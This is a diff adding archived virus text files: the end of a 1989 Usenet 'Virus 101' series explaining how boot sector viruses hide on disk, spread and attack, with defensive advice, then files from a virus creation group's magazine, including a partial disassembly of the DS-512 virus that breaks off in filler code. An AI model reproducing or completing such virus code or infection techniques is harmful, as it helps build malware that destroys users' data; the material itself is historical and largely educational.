normal files. There is also the problem of the +space the hidden file occupies, as well as the directory entry. The space +available on the disk will be less than it should be, since the hidden file +is present. These symptoms would not escape detection for long. + +A more effective method is the use of specific disk sectors. The standard +disk layout covered in the preceeding chapter mentioned such things as File +Allocation Tables, and disk directory space. In a standard format Atari +disk, for example, each FAT is 5 sectors long, and the directory is 7 +sectors long. That is more than enough FAT space to accomodate the entire +disk. A virus in need of more space than 480 bytes might write the +remainder of itself in the last sector of the FAT (I have one that does +this). It might also write itself in the last sector of the directory, +taking advantage of a quirk in the operating system. + +When a disk is formatted, all data sectors are normally filled with a +pre-defined value, E5 (hexadecimal). The directory and FAT space is usually +set to 00. When a directory entry is made active, the file name is written +in the directory, along with some other required information. When a file +is deleted, the first byte of the directory entry is set to E5. That makes +the entry available again. This is a carry over from the early days of +floppy disks, when where the directory would exist on a disk was not as +well defined. The directory entries had to appear as empty on a freshly +formatted disk, so E5 was used as a deleted entry mark. That way, no matter +where the directory was, a freshly formatted disk would always appear as +empty. Now, since disk formats are more flexible, the directory is located +by parameters, and normally the entire directory space is zeroed at +formatting time. Since an active entry will have some legitimate ASCII +character in the beginning of the file name, and a deleted entry will have +E5 in the first byte, it is generally assumed that encountering a directory +entry with a value of 00 in the first byte indicates that the entry has +never been used. Since directory entries are used (and deleted ones +re-used) on a first-found basis, finding one with 00 means that not only +has it not been used, but none of the ones following it will have been used +either. Consequently, most software stops looking at the directory entries +when a 00 entry pops up. If there are several more sectors available, there +may be something hiding out there, beyond the last used entry. While this +method of hiding is not foolproof, the typical virus is not concerned about +being bulletproof in all cases. It just has to survive long enough to +reproduce itself, and it has half the battle won. As long as it keeps +spreading, sooner or later it will survive long enough to do the task it is +designed to do, then it wins both halves of the battle. + +There are other ways for the virus to get additional disk space. Typically, +floppy disks are not used up a sector at a time, but rather in groups of +sectors. Each group of sectors is referred to as a data "cluster". The +number of sectors in a cluster is variable, and is one of the parameters +stored in the boot sector. If the number of data sectors on the entire +disk, minus the boot sector, FATs, and directory, is not an exact multiple +of the number of sectors in a data cluster, the remaining sectors will +never be used by the opearting system. A clever virus can find them and +hide there. The inconvenience of this is that the unused sectors would +normally be at the end of the last track of the disk, causing long (and +noticeable) disk seeks to load or spread the virus. + +There is a parameter in the boot sector designed to permit the disk to have +sectors reserved for any purpose, and not accessed as part of the normal +data area. A virus could also use this method to extend itself, but it, +too, has shortcomings. Using this feature requires the parameter to be set +when the disk has absolutely no data on it. Reserving sectors causes the +start of the data area to be moved further into the disk. While the data +area would be moved, the data already on the disk would not. Consequently, +altering the reserved sectors parameter would make all files on the disk +garbage. (They could be returned to proper status by restoring the original +value to the reserved sectors parameter, providing no disk write had +occurred.) There would also be the problem of the disk's free space being +less that it should. + +Consequently, if a virus needs extra space, using prescribed system +features or hidden files is not a good choice, since it is too easily +detected. The approach used so far is to hide in sectors unlikely to be +used, and hope to spread before they get clobbered (and it works). + +OK, so now the virus has managed to get onto a disk in your library, and +then get itself booted into your system at startup or reset. It may have +been on a disk you received from someone, and booted with, or it may even +have been installed by a trojan horse, but it is in your system. How does +it spread? + +There are ways, and then there ways..... + +The most common method is through the vector reserved for floppy disk read +and write functions. As we saw in Chapter 1, floppy disks get changed (some +surprise, eh?). One disk is removed, and another is inserted. When that +happens, the operating system is notified by the physical act of changing +the disk that the event has occurred. How that event is detected will vary +with different disk drives, but there are two common methods. One is the +disk drive latch. Some hardware reports the transition of the latch on the +floppy disk drive's door. When the locking lever is moved, a signal is sent +to the disk controller card, indicating that the disk door has been opened. +(Door is a carry over term from older drive mechanisms which had fully +closing doors over the disk drive slot.) The operating system makes note of +the fact that a disk change may have occurred. + +The other method is the write protect notch. On both 5 1/4 and 3 1/2 inch +disks, the write protect notch tab is located in a position which makes it +impossible to fully remove and install a disk without having the write +protect detection mechanism be fully obstructed at some point, and fully +unobstructed at some point. The detection mechanism may be a physical sense +switch, or an optical sensor. Either way, as the body of the disk is +removed from the drive, it will be blocked. Then, when the disk is out, the +sense area is open. So, the drive will report transitions on the status +line. The operating system notes the change, and sets the necessary flags +to indicate that the disk may not be the same one that was there a little +while ago. It may also be, if the same disk was re-inserted, but that's not +important. The fact that it may have changed is very important. Attempting +to read or write to the disk, without first noting the characteristics of +it, could be very destructive. + +When the next access of the (possibly) changed disk occurs, the operating +system will read the boot sector. In MS-DOS systems, I believe that the +operating system assumes that if there is a possiblity that the disk has +changed, it assumes that it has, dumps all information relative to the old +disk, and starts fresh. In the Atari, the operating attempts to be a bit +smarter. The boot sector contains a serial number which is supposed to be +unique across all disks. This serial number is 12 bits long, and is +assigned when the disk is formatted. If there is a possibility that the +disk has changed, the operating system reads the serial number. If the +serial number is different than before, the disk has changed, all old data +is wiped out, and the new serial number is noted. If the serial number is +the same, the disk has presumably not changed, and the data in the +operating system's internal buffers is assumed to be valid. This leads to +thoroughly trashed disks if two disks have identical serial numbers, and +are used consecutively. + +In any event, when a possible disk change has occurred, the boot sector is +always read to determine the characteristics of the new disk. The operating +system uses the floppy disk read function to access the first sector on the +disk. As previously noted, this disk read function is pointed to by a +vector. If the vector has been altered to point to a virus, the plot +thickens... + +We will assume a typical floppy disk boot sector virus for a while, and see +exactly what happens. The virus first checks the number of the drive being +accessed. If it is not a floppy disk, it passes the call on to the address +it found in the vector. No harm done. + +If the call is to a floppy disk, most viruses check the side, track, and +sector of the call to see if it is the boot sector. If it isn't, it passes +the call on, and again, no harm done. Why? Performance. Not that the virus +cares about good disk performance, mind you. What it cares about is being +noticed. If it was busy snagging all the disk calls, and checking the boot +sector all the time, there would be an incredible increase in disk head +seeking, and a very noticeable drop in performance of the system. Anyone +with at least half a brain (witch inkluds sum smarter komputer pepel) would +notice that, and would become inquisitive about what was happenning. The +virus would have given itself away. No self-respecting virus would want to +be detected before it got a chance to spread, and possibly wreak a bit of +havoc, so it remains inactive until it can accomplish its task unnoticed. + +When the read call is to the boot sector, the virus goes into action. The +data is read into a buffer, as designated by the host operating system's +call, exactly as expected. Normally, the disk read function would return to +the operating system at this point, but the virus doesn't. Depending upon +the sophistication of the virus, several things may happen. Some viruses +will first check the image of the boot sector in the buffer, to see if they +are already on the disk. If they find the disk already has the virus, the +go back to sleep (pleased, we assume!). Some even check revision levels in +the virus image, and replace themselves if the disk had a more recent +version of themselves! + +If the image from the boot sector is not the virus, some will check to see +if the image was of an executable boot. If it was, the virus does not alter +it. Doing so would make a self-booting disk fail forever after, and would +probably lead to the detection of the virus. Other viruses, not as +sophisticated, will not execute this test, and may be spotted more readily. + +Now, assuming that the boot sector is not executable, or that it is but +this virus is too dumb to leave it alone, it's time for the virus to +spread. There is a copy of the boot sector from the original virus disk in +a reserved memory area, from the original boot up process. The executing +copy of the virus knows where that is, since it reserved the memory for +itself and the image at the same time. The characteristics of the disk the +virus came from may not be the same as the disk in the machine now. +Depending upon the operating system's standards, the virus will either copy +the disk parameter information from the current disk into its own image +buffer, or copy its image into the current disk's buffer, leaving the +disk's parameters unchanged. Either way, the result is a copy of the +current disk's parameters, combined with the executable image of the virus. +Now, the executable status checksum must be computed, and added to the +buffer. This may be accomplished by a routine in the virus, or by an +operating system call. If the virus is on an Atari, it might be careful +enough to insure that the serial number on the new disk remains the same. +Failing to do so would lead to all disks with the virus having the same +serial number. That would lead to disks being accidently altered (due to +the serial number test), and the virus would probably be detected too soon. + +When the new checksum is completed, the updated boot sector is re-written +to the disk. All this occurs in much less than the time required for the +floppy disk to make a single revolution, so the boot sector is re-written +on the next spin. Since the rotation speed of the disk is either 300 or 360 +rpms, the total time lost is less than 1/5 of one second. Nearly impossible +for anyone to notice, when combined with the time required for the drive to +load the head, seek to track zero, read the sector, etc. + +The only potential problem here is one of the virus' intended victim's +primary levels of defense: the write protect feature. Despite rumors to the +contrary, I have not seen a virus capable of writing to a write protected +disk. The hardware in the disk drive will not write if the write protect +status is set. It reports an error to the operating system. The virus can +not override this protection, but it must be wary of it. Older viruses were +sometimes spotted when a system error occurred, reporting that an attempt +was being made to write to a disk which was write protected. If the +function being performed (listing a directory, for example) should not be +writing to the disk, there was reason to become suspect. Most viruses now +are more sophisticated. They take over the error vector before attempting +the write, and restore it afterwards. That way, if the attempt to spread +themselves to the new disk fails, the error never gets reported. While the +user doesn't know that the attempt was ever made, the disk also doesn't get +infected. + +Many viruses run counters. Some count the number of already infected disks +they have seen, while others count the number of disks they infect. Either +way, the counting viruses have some threshold they are attempting to reach. +When they reach that number, they (presumably) consider themselves +thoroughly spread, and it is now time to start their third act. + +End of Chapter 2. +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st,comp.sys.apple,comp.sys.mac,comp.sys.ibm.pc +Subject: Virus 101: Chapter 3 +Date: 13 Mar 89 14:24:23 GMT + +First, the mail: + +Addressing a controversial topic is sure to generate some strong responses, +and this one is no exception. Mail of the "Thank You" flavor outweighs the +"You Idiot" flavor by about 4-1, so I'll be pressing on. The majority of +the "You Idiot" mail is from senders who either admit, or display, limited +programming ability. For the benefit of those individuals: I appreciate +your concern. I am not attempting to aid in the spread of viruses, but in +your own understanding of them, and ability to defend yourself. People with +the ability to create a working virus will have found little or nothing +they didn't already know in the preceeding postings. There is certainly +nothing in them that isn't already available in the most fundamental books +about personal computers. The preceeding postings are also written at a +superficial level, and are missing quite a few specific things necessary to +make a real working virus. Those missing items would add nothing to the +layman's understanding of how a virus spreads or works, so are not +included. You need not take my word for this; contact anyone you know who +is knowledgeable in the system software field, and they will confirm it. + +Sin of omission: + +Part of a message received from Forrest Gehrke (feg@clyde.att.com): + +...One method for a virus finding enough space to hide itself, that I have +seen, you have not mentioned. I have noticed that the so-called Pakastani +virus uses non-standard sectoring at tracks 37 and 38 for IBM PC +diskettes... + +Mr. Gehrke is quite right. I did forget to mention this technique. While I +had heard rumors of it being in use, I hadn't seen it in any of the virus +code I've captured (again, I'm in the Atari ST world). + +I have responded to all mail I have recieved (if it requested a response) +including mailing out copies of missed chapters. Several responses have +been returned by various mailers. If you requested something, and haven't +heard from me, either your request or my response failed. + +Now, Chapter 3: + +Once a virus has installed itself, and replicated as frequently as it has +found the opportunity, it will eventually launch whatever form of attack it +was originally designed to do. That attack is the real purpose of the +existance of the virus. Everything up to this point has been for the sake +of getting to this stage. + +What will it do? Almost anything. The limits are imagination and code +space. The most benign virus I've seen claims to be an anti-virus. It +blinks the screen on boot-up. The idea is that if you see the screen blink, +you know that the benign virus is on the disk, rather than a more malicious +one. It does, however, spread itself just like any other virus. From there, +things proceed through the prank levels, time-triggered, messages, ones +which try to simulate hardware failures, to ones which destroy files and +disks. The actions vary from virus to virus. And, of course, there is a +whole different library of viruses for each machine type. Attempting to detect +a virus by describing or recognizing the symptoms is not only a task of +limitless proportions, it is too little too late. When the symptoms appear, +the damage has already been done. + +Several viruses attempt to simulate hardware problems. (Conversly, I've had +several pleas for help with a virus that proved to be other types of +failures.) Frequently these viruses use timers to delay their actions until +the system has been running for some time, and to spread out their +activities to make the problem appear intermittent. Such virus induced +glitches include occasionally faking succesful disk I/O, while actually not +performing the read or write, altering the data being read or written, and +(more commonly) screen display glitches. It is very difficult for anyone to +determine whether such incidents are the results of a virus, or a real +hardware problem. When such incidents start to occur on your system, start +executing whatever virus detection software you have available, before +lugging your system off to a service firm. + +Previously, I mentioned the use of write protected disks as a step in the +right direction to protect yourself. A large percentage of personal +computer systems now use hard disk systems. Floppy disks are more often a +backup media, or offline storage of files not needed on the hard disk for +day to day use. Backing up requires the disks to be writeable, as does +archiving off the infrequently used files. It is good practice to write +protect the archived disks as soon as the files are copied to them. Run +whatever virus checking software you have on the archive disks, write +protect them, and then file them away. + +(When reading the following suggestions about protecting your system from +attacks, keep in mind that not all techniques can be applied to all systems +or all software. Read the documentation accompanying the software before +your first attempt to use it. Be familiar with what it is expected to do +before you run it, and you'll be more able to recognize unexpected activity.) + +The next step is to apply write protection to whatever disks you recieve +software distributed on, before ever inserting them into a computer. Be +they Public Domain, User Group Libraries, Commercial Software, or whatever, +write protect them before you first read them. Then, make a backup copy if +possible. Finally, when first executing the new software, have only write +protected disks in your system. You should be well aware of any legitimate +attempt to write to a disk by the software before it happens, and have +adequate opportunity to insert a writeable disk when the proper time comes. +This will not only give you a clue to the presence of a virus in the new +software, but also protect the new software from a virus already resident +in your system. + +If your system supports the use of a RAM disk, copy new software into the +RAMdisk before executing it the first time. Put write protected disks in +the drives, then execute the software from the RAMdisk. If the software has +no reason to access other disks, especially when starting itself up, be +very suspicious of any disk activity. The most common time for a virus or +trojan horse program to do it's dirty work is at startup, when it is +impossible to tell whether disk access is part of program loading, or some +clandestine operation. By having the software loaded into and executing +from memory, you will be able to detect any disk I/O which occurs. + +Finally, backup everything. Hard disks, floppy disks, tapes, whatever. Make +backup copies, write protect them, and store them in a safe place off-line. +If you are attacked by a dstructive virus, your first problem is to rid +your system of the virus. Do not go to your off-line backups until you have +determined if your problem came from a virus, and if so, that you have +removed it from the system. A backup is useless if you give a virus a +chance to attack it as well as your working copy. + +A significant portion of these three chapters have been related to boot +sector viruses. While the most common type in the Atari and MS-DOS world, +they are certainly not the only type. + +What follows is next is mostly a re-phrasing of an article from "Los +Angeles Computer Currents", June, 1988. There are a few direct quotes from +the copyrighted article. While I do not agree with all that this article +states, I can not disprove the items from a position of experience. Since +my efforts here are to inform, you may judge for yourself. A significant +portion of my remarks are oriented to the Atari ST, but the concept is true +to most all personal computers. + +An article in that issue, by Lewis Perdue, outlined the problems he faced +when the IBM PC running Ventura Publisher he was using to create the first +issue of PC Management Letter became infected. I won't begin to copy all +that, but the most interesting part of the recovery task was when they used +a normal (high-level) format program to clear the hard drive. It didn't +kill the virus. They had to resort to a low level format, and rebuild from +all original distribution disks. Their backups had been infected as well as +their working copies of the software. They relied on a PC specific tool +called Data Physician, by Digital Dispatch, to aid in the detection of the +virus. It implements techniques to diagnose infections, but it has to be +installed before the virus strikes. + +Another, more interesting aspect of the article, was categorizing viruses +into four groups: Shell, Intrusive, Operating System, and Source. + +Shell - these "wrap themselves around a host program and do not modify the +original program." In laymen's terms, such a virus would tack itself onto a +program file, so it would get loaded with the program. It would have to do +this in a manner that would cause itself to be executed before the host, +since the host certainly would not pass control to the virus. + +This would be quite a complex task on an Atari ST (and on systems with a +similar structure for executable program files). The virus program would +have to be quite large in order to deal with the structure of an executable +file on the ST. In simple terms, an executable file (a program) is a series +of unique sections: a header, the code, data, a relocation map, and +possibly a symbol table. The header specifies the size of each of the +following segments. The code is the program, but in a form which will not +run until it has been relocated. The data is constants, literals, messages, +graphic data, etc. The relocation map tells the ST what changes to make to +the code before it can be run. The symbol table is not usually present, +except during program development. The reason behind this structure is that +when a program is created, it does not know where in memory it will reside +when it is executed. Things like RAMdisks, device drivers, accessories, +printer buffers, spelling checkers, and so on, may or may not be present in +the computer when the program is run. Since each of those things require +memory, the place where the program will wind up being loaded is unknown. +So, when it does get loaded, it has to be told where it is. And, since the +program will almost always contain references to itself (subroutines, +variables, etc.) it has to be modified so that those references point to +the right place. That's what the relocation map is for. It details how the +program has to be modified. Once the program is loaded into memory, and +fixed up, the relocation map and symbol table are discarded. So, to hook +into a program file, a virus would have to split the program file, attach +itself to the beginning of the code segment, (that's where execution +begins), re-attach the data, relocation, and (possibly) symbol table +segments, update the relocation map (all the original references would now +have moved), update the header, then re-write itself to the original disk, +assuming there was room on the disk for the (now bigger) file and that the +disk was not write-protected. That's a large amount of work to develop, and +a large amount of code to sneak into a system for the original infection. + +I should mention here that it is not difficult to write "position +independant" code on most micro-processors. You have to set out to do that, +though, and take the necessary steps along the way to keep everything +position independant. Boot sector code is a well known example. The +address where the boot sector will be loaded into memory is unknown, and +there is no relocation done on the code. It has to be position independant. +It also has to fit in the boot sector. If it needs more than the amount of +space in the boot sector, it has to determine its own location, and load +the additional code itself. Of course, that means that it had to have a +place to store the additional code, and it had to know where to find it. +Those items were covered previously. + +Detecting a "Shell" type virus is not difficult. When it attaches itself to +the target program, it must increase the size of the file. While it would +be a real nusiance to check file sizes on a regular basis, there are +programs available to do this for you. An "alteration detection" program +will typically accept a list of programs to recognize. It will write a data +file of its own, noting characteristics of each file in the list, such as +length and date, and then run a numeric algorithm across the file. The +numeric algorithm (typically a Cyclic Redundancy Check, or CRC) will yield +a value which is stored in the alteration detection program's own data +file. Then, on each subsequent execution of the alteration detection +program, it checks the recorded characteristics of each file in its list, +and re-executes the algorithm on the files. It reports back any file which +has been changed since it last executed. Needless to mention, such a +program must be run on the files to be monitored before any virus has an +opportunity to attach itself to those files. Then, it must be run frequently +to have a chance to detect altered files. + +(Back to the types of viruses defined in the article)... + +Intrusive - Intrusive viruses work by patching themselves into an existing +program. This type of virus has two possibilities - either it is willing to +render the host program useless, or it will attempt to co-exist with the +host. If it is willing to corrupt the host, this is not too difficult a +task. It would replace a part of the host program, modify the relocation +map, and wait to get run. When it did, it would abandon the original task +of the host program, and launch its attack. An example of this would be the +virus bearing version of a word processor which struck the IBM compatible +market some years ago. It signed on, looking just like a popular shareware +program, but it was busy re-formatting the hard disk while the user waited +for it to load and get ready to accept input. + +The other flavor of intrusive virus, which attempts to co-exist with the +host program, is terribly difficult to create. It has to modify the host in +a manner that either accomplishes the host's task while also doing it's +own, or find a part of the host that is infrequently or no longer used, and +hide there. It would then have to modify some other part of the host in +order to get itself executed. In either case, a virus of this type has to +be aimed at one specific host program. There's no way it could perform the +analysis necessary to locate such portions of a randomly selected program. +For that reason, an intrusive virus has to target some program that resides +on a large portion of the target computer's installations, and that it is +certain will be available to tamper with when the virus introduction +occurs. That normally means either the Operating System, or some utility +program so common that it is found virtually every where. + +Operating System viruses work by replacing a portion of the Operating +System with their own code. This is similar to the intrusive type, except +that it can use a new trick (and there are ones that do this on the +IBM/MS-DOS computers). As a part of the operating system, it can sneak out +to a hard disk, find an unused part, mark it as defective, and hide there. +That would mean only a very small part of the code would have to be hooked +into the operating system (possibly as an entry in a list of device +initializing routines). That small segment could then allocate adequate +memory for the real routine, and load it from wherever. + +Source Code viruses - I found this type of virus to be a bit unbelievable. +The article reads (I quote): + +Source code viruses are intrusive programs that are inserted into a source +program such as those written in Pascal prior to the program being +compiled. These are the least-common viruses because they are not only hard +to write, but also have a limited number of hosts compared to other types. +(end quote) + +Sounds to me like this would be nearly impossible to accomplish in +after-market software. If, on the other hand, they mean a part of the +program added by a devious member of a development team, then, it is +credible. It brings to mind the story (which I can't verify, but I've heard +it from enough different sources to believe it is true) about what may well +have been the first virus. In case you're not familiar with "C" compilers, +they are usually several different programs, which must be run in proper +sequence, passing files and options from one to the next. Usually, this is +all done by a another program, a "compiler driver", which is almost always +called "cc". You execute "cc", passing it the necessary flags, and the +name(s) of the program(s) you want compiled, and it drives all the +necessary tasks to do it. + +This was reported to have been done by one of the originators of the UNIX +operating system, (name deleted), back in the development days at Bell +Labs. Well, the story goes, he wrote the first versions of UNIX, "C", and +"cc". He had a "back door" to get into a system running UNIX. He built the +back door code into "cc". The code in "cc" checked to see what it was +compiling. If it was the module "login", it incorporated the back door into +the module, so that he could get into the system. If, on the other hand, it +was compiling "cc", it included the code both to re-create itself, and the +code to build the back door into "login". So, every "cc" had the code, and +consequently every UNIX system included the back door. Eventually, it was +discovered, and removed. There followed a frantic rebuilding of every UNIX +system in existance, so the story goes. + +This is the final chapter which will be distributed via cross-posting. +Chapter 4 will relate specifically to viruses captured in the Atari ST +environment, and will be posted only to comp.sys.atari.st. It will come out +about 1 week after this one. This article was posted on March 13, 1989, so you +can determine the approximate delay to your receipt, in case you don't read +that newsgroup, but wish to locate the fourth chapter in comp.sys.atari.st. + +End of Chapter 3. +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st +Subject: Virus 101: Chapter 4 +Date: 21 Mar 89 13:40:56 GMT + +Having discussed the way viruses work, spread, and can be deterred, the +only remaining topic is how to recognize when an attack occurrs. It is not +always as simple, or as straightforward, as it may seem. What may appear to +be a hardware problem may be a virus, and vice-versa. + +There is no absolute way to determine if a given symptom is being caused by +a program error, a hardware error, a virus, or something else. Not all +viruses cause destructive attacks, but those that do are usually devastating. + +When files start vanishing or becoming unreadable, it may be due to any of +several reasons. Poor media, or abuse of media is not uncommon. A dirty disk +drive head, or one drifting out of alignment can cause previously reliable +disks to start producing errors. In the ST, there is the age old problem of +chip sockets and poor contact, and early versions of the ST had some component +reliability problems which could contribute to disk errors. Another source +becoming more frequent is the use of extended capacity disk formats, some of +which are not entirely reliable. There is also the potential of a real hardware +failure in the ST, or the drive. Finally there is the potential of a virus +attack. How do you tell? It's very difficult. + +Actually, the virus is the easiest to detect. Use your favorite virus detect +program, and start searching. If you can't locate one, then you problem could +be any from the list above. If you find one, you must be certain you have taken +every step available to you to insure it has been eradicated before accessing +your backups. + +When the virus does not destroy files, what does it do? It's rather like +the age old "Where does a 600 pound gorilla sit?". Most anyhere he wants, +obviously. A virus can do most anything that any other piece of software can +do. The bigger the code segment of the virus, the more capable it can become. +There are some rather surprising things accomplished by the viruses already +found in boot sectors, when you consider that it has to accomplish its own +loading, spreading, and eventual attack in about 120 instructions. + +Some of the viruses currently spreading do nothing more than mess up the screen +display. When such an event occurs, it is not obvious that it is a virus +attack. It could be a momentary power fluctuation, a software bug of some +kind in the executing application, an intermittent hardware error, or any +of several other causes. The only hope of identifying the source as a virus +is, again, a methodic check of your disk library. + +Familiarity with the appearance of the attacks of known viruses would be +helpful in recognizing when one is present. For that purpose, I have provided +the program "FLU". It is a demonstration program. It does not contain any of +the code present in any virus for the installation of the virus, or the +spreading of the virus. What it does contain is the non-destructive attack +code of several viruses. These attacks are either audio or visual, so that +there is evidence of the attack occurring. There is no simulation of any of +the virus attacks which cause damage to disk data, since there is no way +to recognize when such an attack is occurring (and, of course, the purpose +of the program is to aid in recognizing the symptoms, not to destroy disks!). + +"FLU" is absolutely safe. The program can be viewed as a simple novelty, +which does some strange display alterations. But by running it, and becoming +familiar with the symptoms it displays, you will be capable of recognizing +the characteristics of the attack of several current ST viruses. + +Two of the simulations, the "BLOT" virus and the "SCREEN" virus, attack in +a nearly identical manner. They step on a small portion of the screen. When +speeded up to display the symptoms, they have the appearance of drawing lines +from the top and bottom of the screen. However, when the attack occurs at the +speed at which the virus really operates, the attack would appear more like +a small blot appearing on the screen, since the screen would have most likely +been altered or redrawn by the application program between virus attacks. + +The "FREEZE" virus is probably the most difficult of the non-destructive +viruses to recognize, since it is the most subtle. It takes over the +ST for an ever increasing period of time, causing a gradual slowing the +machine. Again, the demonstration runs at a significantly higher speed than +the real virus. + +This concludes the virus discussions. It has been the goal of these postings +to inform the general public of the way viruses spread, attack, and can be +dealt with. It is clear to me that, as a defense, ignorance has been +unsuccessful. + +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside + \ No newline at end of file diff --git a/textfiles.com/virus/avcr-01.001 b/textfiles.com/virus/avcr-01.001 new file mode 100644 index 00000000..871af5a2 --- /dev/null +++ b/textfiles.com/virus/avcr-01.001 @@ -0,0 +1,52 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + Introduction To Amateur Virus Creation & Research Group & AVCR Magazine + + AVCR has long awaited, and worked hard towards, the release of their +own AVCR Magazine. It all started when The Gallows Pole BBS was put up as +a virus information \ help service for the Illinois area. The BBS was small +at first, which was what I was expecting, and what I wanted, for I was +picturing an individual help basis. But as all BBS do, we grew, and soon +people from other states started to call, eventually people from other +countries had heard of us, so the individualismic attitude could no longer +be kept. I was watching my board become less and less organized, as our +virus collection expanded, and more people were downloading viruses for +research and had no idea what they were doing. It was then that I joined +Amateur Virus Creation & Research group as a host BBS. + A few weeks after my joining the group the president resigned, and +wanted to leave the group to me, since I was running a fairly popular BBS. +I jumped at the opportunity, and soon organized the group around the +"everyone's president" attitude. This turned out to be a total bust, since +nobody was researching, and everyone was dictating. + I soon saw the flaw, and organized the group into positions. We +had a president, which was me (Th Patron), a vice president, which was MAS, +and researching and creating assignments. The group was running very +smoothly, and so we decided that a magazine was our next step. We worked for +months on the format of our magazine, and figured that the index\individual +file format would be the best. So here we are, and our first magazine has +been published, hurray! + Our magazine will hopefully address the new viruses out there, and +the new ideas out there related to the virus field. We will include some of +our research results, along with new legislature, and information about the +various virus creation \ information groups out there. We are expecting an +interesting and informative magazine. + diff --git a/textfiles.com/virus/avcr-01.002 b/textfiles.com/virus/avcr-01.002 new file mode 100644 index 00000000..8c34d0a5 --- /dev/null +++ b/textfiles.com/virus/avcr-01.002 @@ -0,0 +1,1087 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + Researched by Th Patron + +Name: The DS-512(New512) Virus +----------------------------------------------------------------------------- +Alias: NEW512 +----------------------------------------------------------------------------- +Type of Code: Non-Memory Resident ; Targets COMMAND.COM \ Boot sector +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported NEW512.COM as: "Infected by DS-512 +virus." +"No checksum / recovery information available." +"The program traps the loading of software. Might be a virus that inter- +cepts program load to infect the software." +"Undocumented interrupt/DOS call. The program might be just trickey +but can also be a virus using a non-standard way to detect itself." +"EXE/COM determination. The program tries to check whether a file is +a COM or EXE file. Viruses need to do this to infect a program." +"Found code that can be used to overwrite/move a program in memory." + +(2) +Frisk Software's F-Protect (F-PROT) reported NEW512.COM as: "contains +unusual code, which is normally only found in viruses." + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) did not detect the DS-512 virus. + +(4) +MicroSoft Anti Virus (MSAV.EXE) did not detect the DS-512 virus. +----------------------------------------------------------------------------- +Execution Results: + When executed the DS-512 sends a beep to your speaker and +displays the text: "This is New 512 Virus .........!!!" The computer's +speed is drastically reduced, due to the hard disk being used WILDLY! +The virus's Checksum is changed from 00DC to 0015. Below are the +disassembled DS-512 virus BEFORE execution and AFTER the computer has +been reset! Interestingly, when the computer is reset a third time the +checksum changes back from 0015 to 00DC and so does the virus's code, so +the third(+) time the computer is reset the DS-512 virus's code is the +same as BEFORE execution. +----------------------------------------------------------------------------- +Cleaning Recommendations: + To clean the DS-512 virus we recommend replacing infected files, and +replacing the boot sector (use the SYS command). +----------------------------------------------------------------------------- +Researcher's Notes: + None +----------------------------------------------------------------------------- + Disassembly of the DS-512 Virus BEFORE Execution +----------------------------------------------------------------------------- + PAGE 60,132 + + +data_ff = 0FFh +data_205 = 205h +data_209 = 209h + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + jmp loc_2 + + dw 758Bh, 30h, 0B8h, 0CD4Ch +var1_10b db '!This is New 512 Virus .........!!!' + db 7, 24h, 0B4h, 9, 0BAh, 0Ch + db 1, 0CDh, 21h + db 11 dup (0) +loc_1: ; N-Ref=0 + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr 